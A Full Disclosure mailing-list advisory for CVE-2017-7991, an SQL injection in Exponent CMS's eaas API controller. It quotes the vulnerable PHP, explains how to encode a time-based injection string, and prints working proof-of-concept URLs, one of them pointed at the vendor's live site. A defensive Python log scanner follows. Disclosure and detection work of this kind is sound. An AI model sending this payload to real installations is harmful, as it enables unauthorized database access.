Message-ID: <tencent_00A76ED10D152E9103044314@qq.com>
Date: Fri, 21 Apr 2017 14:14:38 +0800
From: "404 Not Found" <root@...notfound.org>
To: "fulldisclosure" <fulldisclosure@...lists.org>
Subject: [FD] CVE-2017-7991-SQL injection-Exponent CMS

CVE-2017-7991-SQL injection-Exponent CMS

[Suggested description]
> Exponent CMS 2.4.1 and earlier has SQL injection via a base64
> serialized API key (apikey parameter) in the api function of
> framework/modules/eaas/controllers/eaasController.php.
>
> ------------------------------------------
>
> [Additional Information]
> Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php
> Vulnerable function is api.
>
> public function api() {
>     if (empty($this->params['apikey'])) {
>         $_REQUEST['apikey'] = true; // set this to force an ajax reply
>         $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
>         $ar->send(); //FIXME this doesn't seem to work correctly in this scenario
>     } else {
>         echo $this->params['apikey'];
>         $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));
>         echo $key;
>
>         $cfg = new expConfig($key);
>         $this->config = $cfg->config;
>         if(empty($cfg->id)) {
>             $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
>             $ar->send();
>         } else {
>             if (!empty($this->params['get'])) {
>                 $this->handleRequest();
>             } else {
>                 $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
>                 $ar->send();
>             }
>         }
>     }
> }
>
> We can control param $apikey by using base64_encode and serialize
> functions to encrypt the SQL injection string. Then, the $apikey will
> be decrypted and cause SQL injection. Such as, if we want to use
> "aaa\'or sleep(2)#" to inject, we should use "echo
> base64_encode(serialize($apikey));" to encrypt the Attack string:
> czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So,
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
> is the PoC. The result is: the site will sleep several seconds, and
> you can see SQL injection is successful in MySQL logs.
>
> ------------------------------------------
>
> [Vulnerability Type]
> SQL Injection
>
> ------------------------------------------
>
> [Vendor of Product]
> Exponent CMS
>
> ------------------------------------------
>
> [Affected Product Code Base]
> Exponent CMS - 2.4.1 and earlier
>
> ------------------------------------------
>
> [Affected Component]
> \framework\modules\eaas\controllers\eaasController.php, function api(), param $apikey
>
> ------------------------------------------
>
> [Attack Type]
> Remote
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>
> http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7
>
> ------------------------------------------
>
> [Discoverer]
> 404notfound

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
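The advisory's point for a defender is that the injected value never appears in clear text on the wire: the CMS runs urldecode, base64_decode and unserialize on the apikey parameter, so an access log only shows an opaque blob. The following is an added example (not Exponent CMS code and not the reporter's) that reproduces that decoding chain in Python and flags eaas api requests whose decoded key contains characters outside an assumed alphanumeric key alphabet; the log lines are constructed, in common log format, and the safe-key pattern is an assumption to adjust per deployment.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, unquote, urlsplit

# PHP string serialization: s:<byte length>:"<bytes>";
_SERIALIZED_STR = re.compile(rb'^s:(\d+):"(.*)";$', re.DOTALL)
# Assumed alphabet of a legitimate Exponent API key (not taken from the CMS).
SAFE_KEY = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def php_serialize_string(s: str) -> bytes:
    """Serialize a plain string the way PHP's serialize() does."""
    b = s.encode()
    return b's:%d:"%s";' % (len(b), b)


def php_unserialize_string(blob: bytes):
    """Parse s:<len>:"...";. Returns None for non-strings or a length mismatch."""
    m = _SERIALIZED_STR.match(blob)
    if not m or int(m.group(1)) != len(m.group(2)):
        return None
    return m.group(2).decode("utf-8", "replace")


def decode_apikey(raw: str):
    """Mirror api(): urldecode -> base64_decode -> unserialize (string case only)."""
    try:
        blob = base64.b64decode(unquote(raw), validate=True)
    except (binascii.Error, ValueError):
        return None
    return php_unserialize_string(blob)


def apikey_from_request_line(line: str):
    """Return the apikey value of an eaas/api request in a CLF log line, else None."""
    m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    if qs.get("module") != ["eaas"] or qs.get("action") != ["api"]:
        return None
    return qs.get("apikey", [None])[0]


def scan_log(text: str):
    """Return (line number, decoded key) for each key that is unparsable or off-alphabet."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        raw = apikey_from_request_line(line)
        if raw is None:
            continue
        key = decode_apikey(raw)
        if key is None or not SAFE_KEY.match(key):
            findings.append((n, key))
    return findings


# Constructed sample log: line 1 carries the blob from the advisory, line 2 a benign key.
_BENIGN = base64.b64encode(php_serialize_string("abcd1234")).decode()
SAMPLE_LOG = (
    '10.0.0.5 - - [21/Apr/2017:14:14:38 +0800] "GET /exponent/index.php?module=eaas'
    '&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 HTTP/1.1" 200 512\n'
    '10.0.0.7 - - [21/Apr/2017:14:15:02 +0800] "GET /exponent/index.php?module=eaas'
    f'&action=api&apikey={_BENIGN} HTTP/1.1" 200 73\n'
)

if __name__ == "__main__":
    for n, key in scan_log(SAMPLE_LOG):
        print(f"line {n}: suspicious apikey -> {key!r}")
```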